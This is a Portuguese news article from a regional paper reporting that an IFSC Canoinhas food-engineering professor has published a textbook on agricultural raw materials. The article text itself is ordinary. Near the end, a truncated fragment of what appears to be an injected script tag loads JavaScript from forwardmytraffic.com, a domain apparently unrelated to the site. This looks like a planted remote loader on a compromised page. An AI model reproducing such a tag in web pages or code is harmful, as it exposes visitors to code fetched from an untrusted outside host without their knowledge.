InícioDestaqueProfessor do IFSC publica livro didático sobre matérias-primas agropecuárias

Professor do IFSC publica livro didático sobre matérias-primas agropecuárias

Últimas notícias

Em ação rápida policias recuperam veículo roubado em Canoinhas

Nesta quinta-feira, 20, a Polícia Militar foi  acionada para...

Mulher vítima de violência doméstica aciona a PM através do botão do pânico

Na manhã desta quinta-feira, 20, uma mulher vítima de...

Obra é destinada a estudantes de cursos técnicos e superiores em Alimentos

Desde que decidiu seguir a carreira acadêmica, o engenheiro de alimentos e, atualmente, professor do eixo de produção alimentícia do Câmpus Canoinhas do Instituto Federal de Santa Catarina (IFSC), Luiz Paulo de Lima, cultivava o sonho de publicar um livro. Projeto que se concretizou neste ano, com a publicação, pela Editora UFV, do livro didático “Matérias-primas agropecuárias”, destinado a estudantes dos módulos iniciais de cursos técnicos e superiores em Alimentos.

 

Segundo Luiz Paulo, o livro aborda conceitos como sazonalidade, regionalidade e perecibilidade, além de trazer uma discussão sobre a importância socioeconômica da produção de alimentos, características de qualidade de matérias-primas agropecuárias e aspectos introdutórios de algumas matérias-primas de origem vegetal e animal.

 

Ele conta que a ideia de preparar um referencial de estudos, tanto para ele quanto para os alunos, surgiu em 2015, quando começou a trabalhar como professor substituto na Universidade Federal de Viçosa (UFV), em Minas Gerais, onde ministrou a unidade curricular de matérias-primas agropecuárias. “Muitas vezes, esta é a primeira disciplina técnica nos cursos da área de alimentos e tem como objetivos apresentar os principais tipos de matérias-primas de origem vegetal e animal, compreender a sua importância e as dificuldades associadas ao seu processamento e introduzir conceitos básicos de beneficiamento”, justifica.

 

Por conta da diversidade do conteúdo, o professor se viu desafiado a construir um material de apoio que estivesse efetivamente de acordo com o que a unidade curricular se propunha. O processo começou com a organização de uma estrutura básica, com tópicos, subtópicos e algum conteúdo, de acordo com seus próprios conhecimentos. Na etapa de revisão de literatura, ele usou dados das literaturas nacional e internacional, dando preferência a materiais livremente disponíveis na internet, para facilitar a pesquisa de quem quer se aprofundar nos temas. “O fato de ministrar uma unidade curricular que aplica estes conteúdos foi fundamental, pois o dia a dia do processo de ensino-aprendizagem facilitou a visualização dos principais pontos de melhoria do material”, explica.

 … src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe Gazeta
Equipe Gazetahttps://gazetanortesc.com.br
Somos um jornal de notícias e classificados gratuitos. Estamos há 25 anos no mercado e nosso principal diferencial é o jornal digital.